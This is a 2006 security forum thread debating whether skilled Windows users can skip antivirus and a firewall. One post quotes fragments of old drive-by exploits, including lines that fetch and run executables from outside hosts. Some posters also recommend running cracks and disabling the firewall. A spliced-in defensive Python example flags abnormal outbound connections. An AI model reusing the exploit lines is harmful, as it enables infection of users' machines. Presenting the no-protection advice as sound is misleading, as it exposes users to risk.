I'm an advanced windows user. Should I still use a firewall and AV?

Discussion in 'other security issues & news' started by Pain of Salvation, May 12, 2006.

Thread Status:
Not open for further replies.
  1. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,934
    Location:
    SW. Oklahoma

    If what you say is true you are a very rare exception. In the real world it just doesn't happen that way. The malware is getting very sophisticated and even specialized apps are having trouble detecting some of it, and there is no way you can do it without them. How would you know if you had a rootkit without a specialized detector? You couldn't.
     
  2. dylanfan

    dylanfan Registered Member

    Joined:
    Feb 10, 2006
    Posts:
    187
    Hi Mrk...
    No one has. It's never fully patched. It can be fully updated, but that doesn't mean it's actually patched (which would mean "perfect").
    And even if it was possible to be perfectly patched, one would still have to go through the trouble of keeping it that way. Technologies evolve - they live and die.
     
    Last edited: May 14, 2006
  3. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    Not often, but in some cases, like when I download and run cracks and to be sure that my PC is clean. Anyway... My computer says thanks to me, cos there's no RAM consumption from an antivirus running all the time.


    I don't. I just prioritize what is being explored. Social engineering is an example. If a new threat appears, it will be probably (very low) harmless.

    I agree with you. I might be wrong even though the Kaspersky online scanner says I'm clean.

    "Perhaps you're a zombie who doesn't even know he's one, hhmmm!?"

    I trust the Kaspersky online scanner and, as a second opinion, sometimes I use others (online scanners).

    "If you're on XP SP2, then I bet you did not stop the default-enabled inbound firewall, right?"

    I did it. I don't see a concrete reason to keep it running and spare my RAM.

    Cheers
     
  4. Bob D

    Bob D Registered Member

    Joined:
    Apr 18, 2005
    Posts:
    1,234
    Location:
    Mass., USA
    I consider myself as an "advanced" automobile user (driver).
    But I always wear my seatbelt and make sure my car insurance is up to date.
     
  5. lotuseclat79

    lotuseclat79 Registered Member

    Joined:
    Jun 16, 2005
    Posts:
    5,390
    Re: I'm an advanced windows user. Should I still use a firewall and AV?

    If I were you, I would download and run the following to help determine if there are any stealthed rootkits hiding on your computer you don't know about if you are without firewall and AV and have not already done so:

    RootkitRevealer v1.7: http://www.sysinternals.com/SecurityUtilities.html
    BlackLight: http://www.f-secure.com/blacklight/try.shtml (beta 'til 1 June '06)
    RootKitHookAnalyzer: (freeware) http://www.resplendence.com/hookanalyzer (information about)

    ~removed direct download link to hookanalyzer....Bubba~

    -- Tom
     
    Last edited by a moderator: May 14, 2006
  6. dylanfan

    dylanfan Registered Member

    Joined:
    Feb 10, 2006
    Posts:
    187
    Nobody could agree with that statement you're making. Who can be sure future threats would 'probably' be relatively 'harmless'? No advanced user would ever say such a thing.
    Incorrect again. I meant to say you were incorrect when stating you never use AV's.
    You surely don't spare internet bandwidth nor time by online scanning.
     
    Last edited: May 14, 2006
  7. dylanfan

    dylanfan Registered Member

    Joined:
    Feb 10, 2006
    Posts:
    187
    [Well, we'll have to take your word on that ;):D]
    Seriously, I agree with what Bob is trying to communicate here. It's these kinds of habits which more than probably contribute to making one an advanced driver and give one some right to call oneself such. Same thing in Cyberworld: intelligent information, well thought-out habits, then -maybe- some right to be called "advanced".

    BTW Bob, some digression here...
    I know that in Belgium, people are always encouraged to practice safe driving when going out for a 'fiesta' [the party, not the car] by volunteering a 'Bob' (if he's a man) or a 'Bobette' (if a woman) who spends the party enjoying without drinking any drop of alcohol. This way, the whole group knows it can rely on him (her) to safely bring everybody home at the end of the night... I think the names relate to two young Belgian comics heroes.

    Cheers
     
    Last edited: May 14, 2006
  8. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Re: I'm an advanced windows user. Should I still use a firewall and AV?

    I did say,

    "There are other ways to prevent the unexpected/inadvertent mishap."

    Here is an old one:

    Code:
    Function InitPaths
    Trojan_Path="http://210.0.219.41/cgi-bin/ie0601.cgi?exploit=MS03-032"        
    
    http://www.rsjones.net/imgs/rem-1.gif

    This had not yet been detected by AV:

    http://www.rsjones.net/imgs/rem-1a.gif
    _____________________________________________________________

    Code:
    GetProcAddress-LoadLibrary-GetSystemDirectory-
    urlmon.dll-URLDownloadToFile-WinExec- 
    HxxP://195.225.177.33/vx/win32.exe
    
    http://www.rsjones.net/imgs/rem-2.gif
    _____________________________________________________________


    Code:
    script sClickUrl = 'http://certified-safe-downloads.com/adserver/RegClean_W0.exe
    sTrackingUrl = 'hxxp://certified-safe-downloads.com/
    
    http://www.rsjones.net/imgs/rem-3.gif
    _____________________________________________________________

    Agreed. In answer to the original poster's first post, I'm saying that AV is not necessary, that there are other ways. Then, with his second post, I suggested that he take stock of his own situation and plan accordingly.

    The typical users I work with would have very little possibility of encountering these drive-by exploits in the first place, due to the types of sites on which they occur.

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier
     
  9. The Iceman

    The Iceman Registered Member

    Joined:
    May 3, 2006
    Posts:
    1
    Location:
    Aylmer, Quebec
    The only User who does not need an AV, Firewall, and Anti Spy should have no CDROM Drive, no Floppy Drive or USB Ports and no Internet Connection.

    Also, the more advanced a user believes he is, the more tendency he has to get into trouble.

    My Humble Opinion for what it is worth.


    The Iceman

    MCSE
    CNE
    CNA
    A+
    Microsoft Power User

    :rolleyes:
     
  10. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,934
    Location:
    SW. Oklahoma

    :thumb: :thumb:
     
  11. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,213
    Hello,
    I must disagree Iceman.
    The more you know the more you get into trouble - correct, but you also know how to get out of trouble. You do not need firewall, av and anti-spy to stay safe. I tell this without arrogance - simple truth of more than 6 years of surfing the net (5 or so on broadband), with lots of porn, p2p and whatnot. And I call myself conservative, because I have friends who do 10 times more daring things than I do and nothing happens.
    I do not deny the threat - it's real, it's out there.
    But it does not happen magically. You just need to know when and where to be, like in life. Only it's much simpler, because if you don't like something, you hit the reset button and start over. Wish life were so simple eh?

    Apropos seat belts, this does not apply! Because you can die in car accident whereas the worst that can happen with computers is 6-7 hours of reformat.

    Cheers,
    Mrk
     
  12. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    Why not? What else could be expected? There's not much surprise.
    And also it's better living in the present.
    But let's say that a new threat is coming. Wouldn't you be prepared?
    Fact #1: Windows XP is getting old and the lamers/crackers change their focus.
    Now do you see any new attack on Windows 95 or Windows 3.1? The focus is Windows 2000/XP/2003 (that's the present since there are a lot of people using it).

    Fact #2: MS is making improvements in Windows Vista. Even so I'll use Windows XP for a long time.
     
  13. WSFuser

    WSFuser Registered Member

    Joined:
    Oct 7, 2004
    Posts:
    10,639
    Even if a threat is expected, it doesn't make it harmless. There's lots of people whose computers are vulnerable to rootkits, drivers, and other malware.

    "Advanced" users aren't as likely to become infected, but it's still better to be safe than sorry.
     
  14. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    "Just to shoot a very big hole in your security without AV/FW. Have you ever heard of drive-by downloads?? Without AV or FW you would never know it was happening and once it does happen it could be relatively harmless but that is not likely to be the case."

    I know drive-by downloads, but I don't use IE.
     
  15. Alphalutra1

    Alphalutra1 Registered Member

    Joined:
    Dec 17, 2005
    Posts:
    1,160
    Location:
    127.0.0.0/255.0.0.0
    Ever heard of Java or JavaScript? :ninja:

    Alphalutra1
     
  16. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    Yes... I don't like Java, it is too slow. That's why it's not installed on my Firefox.
     
  17. Alphalutra1

    Alphalutra1 Registered Member

    Joined:
    Dec 17, 2005
    Posts:
    1,160
    Location:
    127.0.0.0/255.0.0.0
    Actually java is faster than c++ :eek: ;)

    Anyhow, I assume that you mean JRE is not installed? Because you can't uninstall Java from Firefox, you can only disable Firefox from being able to use it. Also, since you seem to use colors and smilies in your post, then you use JavaScript ;) (unless you have memorized some BBCode) which is different than Java. I would recommend the NoScript extension to help you out there.

    Alphalutra1
     
  18. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    An "advanced" user would surely be one able to make their own decisions about the risks they face and how to address them? ;)

    It is possible to run a secure system without an anti-virus, provided you use other means to control what programs are allowed to run (e.g. Process Guard, System Safety Monitor, AppDefend, etc). However you do need to ensure that: (a) Windows cannot run any programs without your explicit consent and (b) you are aware of what constitutes "normal" activity on your system and can recognise (and block) anything "abnormal".

    A firewall (with good leaktest detection capability) is also important in providing extra information on program behaviour (svchost.exe connecting to windowsupdate.com may be normal but svchost.exe connecting to dsl33-449-1002.randomuser.randomISP.com certainly isn't). While malware doesn't have to connect to the Internet to cause problems, in practice they virtually all do.
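
Editor's added example (not part of the post above, and not any poster's code): one way to apply the "normal vs. abnormal" destination check the post describes to outbound-connection log lines. The log format, the `BASELINE` table, the process name `unknown.exe` and the sample lines are assumptions constructed for illustration; the two svchost.exe hostnames are the ones the post mentions.

```python
# Added example: per-process baseline check over outbound-connection log lines.
# Log format, BASELINE contents and SAMPLE_LOG are constructed for illustration.

BASELINE = {
    # process name (lowercase) -> domain suffixes considered normal for it
    "svchost.exe": ("windowsupdate.com", "microsoft.com"),
    "firefox.exe": ("*",),  # a browser is expected to reach any destination
}

SAMPLE_LOG = """\
2006-05-14T10:01:02 svchost.exe download.windowsupdate.com 80
2006-05-14T10:03:17 svchost.exe dsl33-449-1002.randomuser.randomISP.com 6667
2006-05-14T10:04:40 SVCHOST.EXE evilwindowsupdate.com 80
2006-05-14T10:05:09 firefox.exe www.example.org 443
2006-05-14T10:06:55 unknown.exe 192.0.2.10 80
"""

def host_matches(host, suffix):
    """True if host equals suffix or is a subdomain of it (label boundary)."""
    host, suffix = host.lower().rstrip("."), suffix.lower()
    return suffix == "*" or host == suffix or host.endswith("." + suffix)

def classify(line):
    """Return (verdict, process, host) for one log line."""
    _ts, process, host, _port = line.split()
    allowed = BASELINE.get(process.lower())
    if allowed is None:
        # No baseline at all: the user never approved this program.
        return ("unknown-process", process, host)
    if any(host_matches(host, s) for s in allowed):
        return ("normal", process, host)
    return ("abnormal-destination", process, host)

def review(log_text):
    """Return only the entries that deserve a closer look."""
    results = (classify(l) for l in log_text.splitlines() if l.strip())
    return [r for r in results if r[0] != "normal"]

if __name__ == "__main__":
    for verdict, process, host in review(SAMPLE_LOG):
        print(f"{verdict:22} {process:12} -> {host}")
```

The suffix comparison is done on a label boundary, so a look-alike such as `evilwindowsupdate.com` is flagged rather than treated as a Windows Update host.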
     
  19. sweater

    sweater Registered Member

    Joined:
    Jun 24, 2005
    Posts:
    1,678
    Location:
    Philippines, the Political Dynasty Capital of the
    Mr. Bond you're on drugs...:D hehehe...:D ;)

    Did you know that most car accidents happen coz the car was driven by "expert car drivers"? They are so confident with their expertise in driving a car that no one can teach them how to slow down and to be careful while driving. Same thing with a PC connected to cyberspace... :cautious: :blink:

    Protection is a must whatever and whoever you are, you must always wear a condom every time you visit those unknown places w/ lots of beautiful babes out there. :-* :cool:

    I think there are always some guys out there that are probably more advanced and ahead than you... and they always have the passion of destroying your PC. :oops: :p

    So even if you are Mr. Bond, still, you need a firewall and antivirus. An ounce of prevention is better than a ....cure..(ah whatever...o_O )..
     